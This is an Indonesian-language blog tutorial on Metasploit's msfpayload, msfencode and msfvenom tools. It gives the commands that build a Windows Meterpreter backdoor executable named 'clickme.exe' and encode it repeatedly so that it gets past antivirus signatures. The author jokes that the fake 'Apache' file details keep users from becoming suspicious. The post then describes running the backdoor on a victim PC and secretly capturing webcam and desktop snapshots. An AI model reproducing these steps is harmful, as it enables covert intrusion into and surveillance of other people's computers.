Metasploit Framework: ‘msfvenom’

Akhirnya bisa nulis blog lagi.. Beberapa hari yang lalu Metasploit Framework memperkenalkan ‘msfvenom’. Msfvenom adalah fitur baru metasploit yang menggabungkan dua fungsi lama pada Metasploit, yaitu ‘msfpayload’ untuk menggenerate payload dan ‘msfencode’ yang akan meng-encode bytes pada payload sehingga bisa lolos dari signature anti-virus.
Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut:

root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp X > /tmp/clickme.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 298
Options: {}

Command diatas akan menghasilkan file binary windows executable (exe). Payload file tersebut adalah sebuah meterpreter metasploit yang akan terhubung ke attacker menggunakan bind TCP. Karena LPORT tidak saya definisikan di sana, jadi LPORT default adalah port 4444. Jadilah file ini, kemudian coba di klik… hyahh.. ada warning antivirus

Virus Warning
Virus Warning

Untuk itulah digunakan msfencode yang akan melakukan encode byte demi byte payload sehingga diharapkan bisa mengecoh signature antivirus

Command untuk meng-encode payload dan keluarannya di /tmp/clickme.exe

root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /tmp/clickme.exe
[*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 406 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 433 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 460 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 487 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 514 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 541 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 568 (iteration=10)

Proses encode menggunakan tipe x86/shikata_ga_nai dengan iterasi sebanyak 10 kali encode.

Sedangkan jika menggunakan command msfvenom, cukup satu perintah saja (perhatikan, perintah di atas ‘kan dua perintah yang dipisah ‘pipe’ atau tanda | ) tapi ‘msfvenom’ hanya seperti ini:

./msfvenom -p windows/meterpreter/bind_tcp -f exe -e -i 3 -s 480 RHOST=10.5.253.213 >> /tmp/clickme.exe

Jadilah file kita. Ini penampakan file hasil buatan kita tercinta.

File Hasil Generate
File Hasil Generate

Ini informasi file buatan kita hehe tipuuuu…. Hmm gak habis pikir kenapa namanya harus Apache yah? Sepertinya biar kalau ada warning dari firewall “Program bernama: Apache ingin melakukan koneksi”, user ga ada perasaan curiga…

Informasi File Palsu
Informasi File Palsu

Oke, sekian tentang penggunaan msfvenom a.k.a msfpayload + msfencode… Tapi tanggung selesaiin blognya biar lebih rame kita coba yuk payload meterpreternya. Tinggal eksekusi saja filenya dari PC victim. Setelah itu jalankan handler di komputer penyerang sbb:

Handler Backdoor di Komputer Penyerang
Handler Backdoor di Komputer Penyerang
Netstat Komputer Victim
Netstat Komputer Victim

Sesaat setelah masuk, kita bisa mengetikkan perintah-perintah yang asik haha seperti dibawah ini:

Web Camera Snapshot
Web Camera Snapshot
Desktop Snapshot
Desktop Snapshot

Ah itu kan cuma perintahnya dan laporannya.. Ini hasilnya!! hahaha

Snapshot (Saya Sembunyi Biar Gak Keliatan di Webcam haha)
Snapshot (Saya Sembunyi Biar Gak Keliatan di Webcam haha)
Snapshot Desktop Komputer Victim
Snapshot Desktop Komputer Victim

 

One thought on “Metasploit Framework: ‘msfvenom’

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.